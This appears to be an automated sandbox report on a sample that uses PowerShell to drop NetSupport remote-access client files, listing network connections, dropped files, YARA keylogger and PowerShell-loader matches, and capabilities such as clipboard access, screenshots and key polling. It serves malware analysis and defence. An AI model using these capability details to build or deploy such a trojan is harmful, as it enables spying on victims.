Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.28.14:443 -> 192.168.2.17:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.21.200:443 -> 192.168.2.17:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.133.88.190:443 -> 192.168.2.17:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.104.72.157:443 -> 192.168.2.17:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.133.88.190:443 -> 192.168.2.17:49807 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_1101F350 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,

32_2_1101F350

Contains functionality to modify clipboard data

Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1101F350 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,		32_2_1101F350
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11032870 GetClipboardFormatNameA,SetClipboardData,		32_2_11032870

Contains functionality to read the clipboard data

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_11031B70 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree,

32_2_11031B70

Contains functionality to record screenshots

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,

32_2_110076F0

Potential key logger detected (key state polling based)

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_11110930 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,

32_2_11110930

Yara detected Keylogger Generic

Source: Yara match	File source: 32.2.client32.exe.111b32a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: client32.exe PID: 7408, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\netsupport\client\PCICL32.DLL, type: DROPPED

Drops certificate files (DER)

Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe

File created: C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\Temp\APPX.u5y27yz6k3vi25fmvsudde2mb.tmp

Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_11112960 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,

32_2_11112960

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_7788.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2564, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7788, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\PCICHEK.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\msvcr100.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\AudioCapture.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\remcmdstub.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\client32.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\pcicapi.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\PCICL32.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\HTCTL32.DLL	Jump to dropped file

Contains functionality to communicate with device drivers

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_110A9020: DeviceIoControl,

32_2_110A9020

Contains functionality to launch a process as a different user

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_1115A250 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,

32_2_1115A250

Contains functionality to shutdown / reboot the system

Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1102D1B3 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,		32_2_1102D1B3
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1102CE84 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,		32_2_1102CE84

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BAF41B8E	23_2_00007FF9BAF41B8E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BAF311D8	23_2_00007FF9BAF311D8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BAF3449D	23_2_00007FF9BAF3449D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BAF45783	23_2_00007FF9BAF45783
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CE7A9	23_2_00007FF9BB3CE7A9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CCC3B	23_2_00007FF9BB3CCC3B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C9C9D	23_2_00007FF9BB3C9C9D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C449D	23_2_00007FF9BB3C449D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3B1CAD	23_2_00007FF9BB3B1CAD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CACCE	23_2_00007FF9BB3CACCE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C7C6D	23_2_00007FF9BB3C7C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3BB32D	23_2_00007FF9BB3BB32D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C5B2D	23_2_00007FF9BB3C5B2D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CC33D	23_2_00007FF9BB3CC33D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3B5B51	23_2_00007FF9BB3B5B51
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C6B0D	23_2_00007FF9BB3C6B0D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C63A4	23_2_00007FF9BB3C63A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CBB65	23_2_00007FF9BB3CBB65
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CA35D	23_2_00007FF9BB3CA35D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3BC389	23_2_00007FF9BB3BC389
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CB1FD	23_2_00007FF9BB3CB1FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C7A14	23_2_00007FF9BB3C7A14
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C72CB	23_2_00007FF9BB3C72CB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CAACB	23_2_00007FF9BB3CAACB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C726D	23_2_00007FF9BB3C726D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C628B	23_2_00007FF9BB3C628B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3B111D	23_2_00007FF9BB3B111D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C814D	23_2_00007FF9BB3C814D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C594D	23_2_00007FF9BB3C594D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C68ED	23_2_00007FF9BB3C68ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C78FB	23_2_00007FF9BB3C78FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3B98FD	23_2_00007FF9BB3B98FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C519B	23_2_00007FF9BB3C519B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3B81CD	23_2_00007FF9BB3B81CD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C996D	23_2_00007FF9BB3C996D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CC01D	23_2_00007FF9BB3CC01D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C47DB	23_2_00007FF9BB3C47DB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C9FFD	23_2_00007FF9BB3C9FFD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3B000A	23_2_00007FF9BB3B000A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CB86D	23_2_00007FF9BB3CB86D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C708E	23_2_00007FF9BB3C708E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3B6F3D	23_2_00007FF9BB3B6F3D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CDF10	23_2_00007FF9BB3CDF10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CC7AD	23_2_00007FF9BB3CC7AD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C6FAB	23_2_00007FF9BB3C6FAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C5FAD	23_2_00007FF9BB3C5FAD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C2776	23_2_00007FF9BB3C2776
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3B3F6D	23_2_00007FF9BB3B3F6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CA77D	23_2_00007FF9BB3CA77D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CB61D	23_2_00007FF9BB3CB61D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3B763D	23_2_00007FF9BB3B763D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CA5DD	23_2_00007FF9BB3CA5DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3B2DFD	23_2_00007FF9BB3B2DFD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C660B	23_2_00007FF9BB3C660B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CA52D	23_2_00007FF9BB3CA52D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C6D2D	23_2_00007FF9BB3C6D2D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CBD48	23_2_00007FF9BB3CBD48
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3BCD3D	23_2_00007FF9BB3BCD3D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C559D	23_2_00007FF9BB3C559D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3B956D	23_2_00007FF9BB3B956D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CC58D	23_2_00007FF9BB3CC58D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CCD90	23_2_00007FF9BB3CCD90
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB546FA5	23_2_00007FF9BB546FA5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB5314F0	23_2_00007FF9BB5314F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB69EC75	23_2_00007FF9BB69EC75
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB69B336	23_2_00007FF9BB69B336
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB691B28	23_2_00007FF9BB691B28
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB6A13B0	23_2_00007FF9BB6A13B0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB6A12AF	23_2_00007FF9BB6A12AF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB6A11B6	23_2_00007FF9BB6A11B6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BAF51358	25_2_00007FF9BAF51358
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BAF663E9	25_2_00007FF9BAF663E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BAF66B10	25_2_00007FF9BAF66B10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BAF67288	25_2_00007FF9BAF67288
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BAF5B1D5	25_2_00007FF9BAF5B1D5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB1C9D38	25_2_00007FF9BB1C9D38
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB1C86E1	25_2_00007FF9BB1C86E1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB221760	25_2_00007FF9BB221760
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB253136	25_2_00007FF9BB253136
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB400C1D	25_2_00007FF9BB400C1D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB3FAC40	25_2_00007FF9BB3FAC40
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40AC3E	25_2_00007FF9BB40AC3E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB4133E9	25_2_00007FF9BB4133E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB407BDD	25_2_00007FF9BB407BDD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB406C9D	25_2_00007FF9BB406C9D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40BCB8	25_2_00007FF9BB40BCB8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB4104C0	25_2_00007FF9BB4104C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB3FB31D	25_2_00007FF9BB3FB31D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40CB4D	25_2_00007FF9BB40CB4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB406314	25_2_00007FF9BB406314
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB404B0B	25_2_00007FF9BB404B0B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40CBAB	25_2_00007FF9BB40CBAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB3FE35D	25_2_00007FF9BB3FE35D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40A24C	25_2_00007FF9BB40A24C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40723B	25_2_00007FF9BB40723B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB3FD24D	25_2_00007FF9BB3FD24D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB4091FD	25_2_00007FF9BB4091FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40C2AD	25_2_00007FF9BB40C2AD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB405A9D	25_2_00007FF9BB405A9D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40BAD5	25_2_00007FF9BB40BAD5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB3FFA5D	25_2_00007FF9BB3FFA5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB406A7D	25_2_00007FF9BB406A7D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40BA7D	25_2_00007FF9BB40BA7D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40A92D	25_2_00007FF9BB40A92D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40514B	25_2_00007FF9BB40514B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB4098DD	25_2_00007FF9BB4098DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB3F1199	25_2_00007FF9BB3F1199
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB4001BD	25_2_00007FF9BB4001BD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40B16D	25_2_00007FF9BB40B16D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB407984	25_2_00007FF9BB407984
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40484D	25_2_00007FF9BB40484D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40B7DD	25_2_00007FF9BB40B7DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB3F07FD	25_2_00007FF9BB3F07FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB406FFE	25_2_00007FF9BB406FFE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB3FF00D	25_2_00007FF9BB3FF00D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB3F000A	25_2_00007FF9BB3F000A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB4058BD	25_2_00007FF9BB4058BD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB4080BD	25_2_00007FF9BB4080BD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB3F186D	25_2_00007FF9BB3F186D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40786B	25_2_00007FF9BB40786B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB405F1D	25_2_00007FF9BB405F1D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB406F1B	25_2_00007FF9BB406F1B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40C71D	25_2_00007FF9BB40C71D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40A79D	25_2_00007FF9BB40A79D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB3F47C2	25_2_00007FF9BB3F47C2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB409F6D	25_2_00007FF9BB409F6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40BF8D	25_2_00007FF9BB40BF8D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40161D	25_2_00007FF9BB40161D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB3FD5DD	25_2_00007FF9BB3FD5DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB3FBEAD	25_2_00007FF9BB3FBEAD
